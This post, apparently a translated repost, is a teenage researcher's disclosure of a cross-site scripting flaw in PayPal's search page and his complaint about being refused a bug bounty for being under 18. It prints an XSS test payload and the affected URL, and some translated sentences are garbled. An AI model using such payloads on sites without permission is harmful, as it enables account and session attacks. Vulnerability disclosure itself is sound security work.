Hello all!
I'm Robert Kugler a 17 years old German student who's interested in
securing computer systems.
')
I would like to be cross-site
Scripting vulnerability!
PayPal Inc. is running a bug bounty program for professional security
researchers.
www.paypal.com/us/webapps/mpp/security/reporting-security-issues
XSS vulnerabilities are in scope. I have tried
to PayPal Site Security.
The vulnerability is located in the search function and can be triggered.
with the following javascript code:
'; alert (String.fromCharCode (88,83,83)) //'; alert (String.fromCharCode (88,83,83)) // ";
alert (String.fromCharCode (88,83,83)) // "; alert (String.fromCharCode (88,83,83)) // -
</ SCRIPT> "> '> <SCRIPT> alert (String.fromCharCode (88,83,83)) </ SCRIPT>
www.paypal.com/de/cgi-bin/searchscr?cmd=_sitewide-search
Screenshot: picturepush.com/public/13144090
Unfortunately PayPal disqualified me payment
because of being 17 years old ...
PayPal Site Security:
“To be eligible for the Bug Bounty Program, you * must not *:
... Be less than 18 years of age. If PayPal discovers that a researcher does
PayPal will remove that researcher from
the Bug Bounty Program and disqualify them from receiving any bounty
payments. "
I don’t want to pay
you are not interested in security
researchers ...
Best regards,
Robert Kugler
Source: https://habr.com/ru/post/181013/